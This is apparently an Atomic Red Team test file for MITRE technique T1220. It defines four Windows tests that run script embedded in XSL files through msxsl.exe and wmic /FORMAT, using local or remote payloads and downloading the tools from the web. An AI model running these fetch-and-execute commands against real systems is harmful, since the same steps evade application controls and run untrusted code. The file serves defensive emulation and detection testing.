attack_technique: T1220 display_name: XSL Script Processing atomic_tests: - name: MSXSL Bypass using local files auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d description: | Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL. No longer available from Microsoft. (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ) Open Calculator.exe when test successfully executed, while AV turned off. supported_platforms: - windows input_arguments: xmlfile: description: Location of the test XML file on the local filesystem. type: path default: PathToAtomicsFolder\T1220\src\msxslxmlfile.xml xslfile: description: Location of the test XSL script file on the local filesystem. type: path default: PathToAtomicsFolder\T1220\src\msxslscript.xsl msxsl_exe: description: Location of the MSXSL executable. type: path default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe dependency_executor_name: powershell dependencies: - description: | XML file must exist on disk at specified location (#{xmlfile}) prereq_command: | if (Test-Path "#{xmlfile}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{xmlfile}") -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: | XSL file must exist on disk at specified location (#{xslfile}) prereq_command: | if (Test-Path "#{xslfile}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{xslfile}") -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" - description: | msxsl.exe must exist on disk at specified location (#{msxsl_exe}) prereq_command: | if (Test-Path "#{msxsl_exe}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" executor: command: | "#{msxsl_exe}" "#{xmlfile}" "#{xslfile}" cleanup_command: | del "#{msxsl_exe}" >nul 2>&1 name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 description: | Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL.exe. No longer available from Microsoft. (Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ) Open Calculator.exe when test successfully executed, while AV turned off. supported_platforms: - windows input_arguments: xmlfile: description: Remote location (URL) of the test XML file. type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml xslfile: description: Remote location (URL) of the test XSL script file. type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl msxsl_exe: description: Location of the MSXSL executable. type: path default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe dependency_executor_name: powershell dependencies: - description: | msxsl.exe must exist on disk at specified location ("#{msxsl_exe}") prereq_command: | if (Test-Path "#{msxsl_exe}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" executor: command: | "#{msxsl_exe}" "#{xmlfile}" "#{xslfile}" cleanup_command: | del -Path #{msxsl_exe} >nul 2>&1 name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 description: | Executes the code specified within a XSL script using a local payload. supported_platforms: - windows input_arguments: wmic_command: description: WMI command to execute using wmic.exe type: string default: process list local_xsl_file: description: Location of the test XSL script file on the local filesystem. type: path default: PathToAtomicsFolder\T1220\src\wmicscript.xsl dependency_executor_name: powershell dependencies: - description: | XSL file must exist on disk at specified location (#{local_xsl_file}) prereq_command: | if (Test-Path "#{local_xsl_file}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{local_xsl_file}") -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: | wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" name: command_prompt - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b description: | Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test successfully executed, while AV turned off. supported_platforms: - windows input_arguments: remote_xsl_file: description: Remote location of an XSL payload. type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl wmic_command: description: WMI command to execute using wmic.exe type: string default: process list executor: command: | wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}" name: command_prompt